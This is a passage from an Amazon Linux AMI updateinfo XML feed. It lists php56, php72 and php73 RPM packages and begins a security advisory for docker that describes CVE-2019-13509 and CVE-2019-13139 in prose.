release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.24" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.24-1.18.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.24" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.24-1.18.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.11" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.11-1.21.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.11" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.11-1.21.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.40-1.143.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.40-1.143.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.40" release="1.143.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.40-1.143.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1316</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1316: medium priority package update for docker</title><issued date="2019-11-04 18:12:00" /><updated date="2019-11-07 00:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13509:
In Docker CE and EE before 18.09.8 (as well as Docker EE before 17.06.2-ee-23 and 18.x before 18.03.1-ee-10), Docker Engine in debug mode may sometimes add secrets to the debug log. This applies to a scenario where docker stack deploy is run to redeploy a stack that includes (non external) secrets. It potentially applies to other API users of the stack API if they resend the secret.
99999:
CVE-2019-13509 docker: Docker Engine in debug mode may sometimes add secrets to the debug log leading to information disclosure
CVE-2019-13139:
A command injection flaw was discovered in Docker during the `docker build` command. By providing a specially crafted path argument for the container to build, it is possible to inject command options to the `git fetch`/`git checkout` commands that are executed by Docker and to execute code with the privileges of the user running Docker. A local attacker who can run `docker build` with a controlled build path, or a remote attacker who has control over the docker build path, could elevate their privileges or execute code.
99999:
CVE-2019-13139 docker: command injection due to a missing validation of the git ref command
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13139" title="" id="CVE-2019-13139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13509" title="" id="CVE-2019-13509" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-debuginfo" version="18.09.9ce" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-18.09.9ce-2.52.amzn1.x86_64.rpm</filename></package><package name="docker" version="18.09.9ce" release="2.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-18.09.9ce-2.52.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1317</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1317: important priority package update for subversion</title><issued date="2019-11-04 18:16:00" /><updated date="2019-11-07 00:23:00" 